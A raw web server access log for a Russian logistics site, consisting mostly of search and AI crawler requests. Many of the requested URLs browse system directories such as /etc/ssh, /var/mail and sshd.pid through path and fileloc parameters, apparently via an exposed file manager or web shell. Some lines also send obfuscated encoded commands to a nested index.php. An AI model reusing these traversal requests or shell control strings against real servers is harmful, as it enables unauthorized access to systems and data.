212.16.195.25 - - [04/Nov/2025:03:59:25 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363336352p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323736352q6638626565363434316663343633633533386164653632626161643834366565222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:02:18 +1000] "GET /1720890496?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:02:20 +1000] "GET /1098464?path=//etc/ssh HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:02:22 +1000] "GET /1720707664?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fdelpaths.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:02:29 +1000] "GET /1317632?path=//etc/dhcp HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:02:30 +1000] "GET /shopdetail/1600512448.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:02:34 +1000] "GET /shopdetail/1600160864.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:02:38 +1000] "GET /shopdetail/1600318432.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:02:40 +1000] "GET /1453808?path=//mnt/data HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:03:59:48 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363338382p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323738382q3663643965323338326637636133306462316363663862623762306161663930222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:02:42 +1000] "GET /shopdetail/1600249936.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:02:46 +1000] "GET /shopdetail/1600265712.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:02:50 +1000] "GET /shopdetail/1600719232.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.242.7 - - [04/Nov/2025:04:02:50 +1000] "GET /758297200?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-cron.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [04/Nov/2025:04:02:52 +1000] "GET /1136960?path=//var/opt HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:02:54 +1000] "GET /shopdetail/1600676528.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:02:59 +1000] "GET /shopdetail/1600314768.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:03:01 +1000] "GET /1362016?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:02 +1000] "GET /shopdetail/1600555216.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:00:12 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363431322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323831322q3463633938613265303638353137623565326433643535353436656261613532222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:03:06 +1000] "GET /shopdetail/1600314224.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:03:10 +1000] "GET /shopdetail/1600815728.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:03:10 +1000] "GET /1457504?path=//etc/dhcp HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:14 +1000] "GET /shopdetail/1600422768.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:03:16 +1000] "GET /1426848?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:18 +1000] "GET /shopdetail/1600322736.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:00:36 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363433362p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323833362q3233313461336639613231313237396232343737613261623734663132303330222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:03:25 +1000] "GET /1340048?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:22 +1000] "GET /shopdetail/1600596432.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:03:39 +1000] "GET /1054240?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.227.253.15 - - [04/Nov/2025:04:03:39 +1000] "GET /?ARRAY=7o2230223n313736323139363837322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333237322q6336636237316333363839373365663461656538306337656235613063643730222p2232223n223630383631333665393166643765636262373836373663313235323437343135222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p2262696r675s70617373223n2232392q34372q35322q36382q37312q38372q3131227q HTTP/1.0" 200 79 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3790 Safari/537.36 Edg/78.0.142.6"
114.119.156.46 - - [04/Nov/2025:04:03:26 +1000] "GET /2439058816?path=/home/region-gk.ru/data HTTP/1.0" 200 28013 "https://region-logist.ru/2439058816?shopdetail=2436183415" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.14 - - [04/Nov/2025:04:03:45 +1000] "GET /1442240?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:47 +1000] "GET /shopdetail/1600761456.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:04:03:28 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?odr/order/regOdrListView/ HTTP/1.0" 200 209162 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:03:51 +1000] "GET /shopdetail/1600472496.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:01:00 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363436302p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323836302q3830323461346232643139303739636537616163323231633739346336366333222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:03:54 +1000] "GET /1264912?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:03:55 +1000] "GET /shopdetail/1600518800.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:03:58 +1000] "GET /shopdetail/1600585584.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [04/Nov/2025:04:03:59 +1000] "GET /listing/137391008 HTTP/1.0" 200 187971 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.244.192 - - [04/Nov/2025:04:04:00 +1000] "GET /758297200?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 15226 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [04/Nov/2025:04:04:02 +1000] "GET /shopdetail/1600679024.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:03 +1000] "GET /1422640?path=//var/adm HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:05 +1000] "GET /shopdetail/1600241088.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:09 +1000] "GET /1133264?path=//etc/dhcp HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:09 +1000] "GET /shopdetail/1600579776.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:13 +1000] "GET /1209088?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:13 +1000] "GET /shopdetail/1600209888.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:01:23 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363438332p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323838332q6232306563343138623564643034346334386139323666313233303334356635222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:04:21 +1000] "GET /shopdetail/1600387312.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:22 +1000] "GET /1322192?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:25 +1000] "GET /shopdetail/1600595040.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:04:29 +1000] "GET /shopdetail/1600443664.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:32 +1000] "GET /1553536?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:33 +1000] "GET /shopdetail/1600560016.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [04/Nov/2025:04:04:33 +1000] "GET /news/uchastie-v-vystake-transrussia?path=/home/region-gk.ru/data/www/new.region-gk.ru/ALFA_DATA HTTP/1.0" 200 181639 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:04:37 +1000] "GET /shopdetail/1600741104.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:01:47 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363530372p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323930372q3136393464656562326464626466626139383231326530306339613530666130222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:04:41 +1000] "GET /shopdetail/1600410256.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:44 +1000] "GET /1350352?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:45 +1000] "GET /shopdetail/1600602848.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
87.250.224.204 - - [04/Nov/2025:04:04:49 +1000] "GET /.well-known/apple-app-site-association HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (compatible; YaDirectFetcher/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0"
216.73.216.53 - - [04/Nov/2025:04:04:49 +1000] "GET /shopdetail/1600631040.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:04:53 +1000] "GET /1133264?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:04:53 +1000] "GET /shopdetail/1600313216.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
95.108.213.149 - - [04/Nov/2025:04:04:56 +1000] "GET /favicon.ico HTTP/1.0" 200 62019 "https://region-logist.ru/.well-known/apple-app-site-association" "Mozilla/5.0 (compatible; YaDirectFetcher/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0"
66.249.76.163 - - [04/Nov/2025:04:04:56 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/48109616.html HTTP/1.0" 200 212312 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:04:57 +1000] "GET /shopdetail/1600526096.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:05:01 +1000] "GET /shopdetail/1600165664.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:02:10 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363533302p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323933302q3763333861633631396536323966376331316562363866393063663433393032222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:05:03 +1000] "GET /1396816?path=//etc/ssh HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:05 +1000] "GET /shopdetail/1600225024.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.141.79 - - [04/Nov/2025:04:05:08 +1000] "GET /2439058816?path=/home/region-gk.ru HTTP/1.0" 200 14069 "https://region-logist.ru/2439058816?shopdetail=2436183415" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.14 - - [04/Nov/2025:04:05:09 +1000] "GET /1054240?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:09 +1000] "GET /shopdetail/1600402416.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:05:13 +1000] "GET /shopdetail/1600791776.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:05:15 +1000] "GET /1284384?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.195.244.225 - - [04/Nov/2025:04:05:16 +1000] "GET /951930848?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes HTTP/1.0" 200 458675 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.76.164 - - [04/Nov/2025:04:05:18 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/2988560.html HTTP/1.0" 200 213020 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:05:20 +1000] "GET /shopdetail/1600235328.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:02:33 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363535332p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323935332q3462363233366134383063306130373638313130383565626166333935363337222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:05:26 +1000] "GET /1101216?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:29 +1000] "GET /shopdetail/1600902400.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:05:32 +1000] "GET /1264912?path=//var/run/initramfs HTTP/1.0" 200 18304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:34 +1000] "GET /shopdetail/1600217728.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:05:37 +1000] "GET /shopdetail/1600323680.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [04/Nov/2025:04:05:39 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/48109616.html HTTP/1.0" 200 212312 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:04:05:41 +1000] "GET /shopdetail/1600683824.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:05:40 +1000] "GET /1264912?fileloc=//var/run/sshd.pid&path=//var/run HTTP/1.0" 200 12313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:45 +1000] "GET /shopdetail/1600363952.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:05:48 +1000] "GET /1489808?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
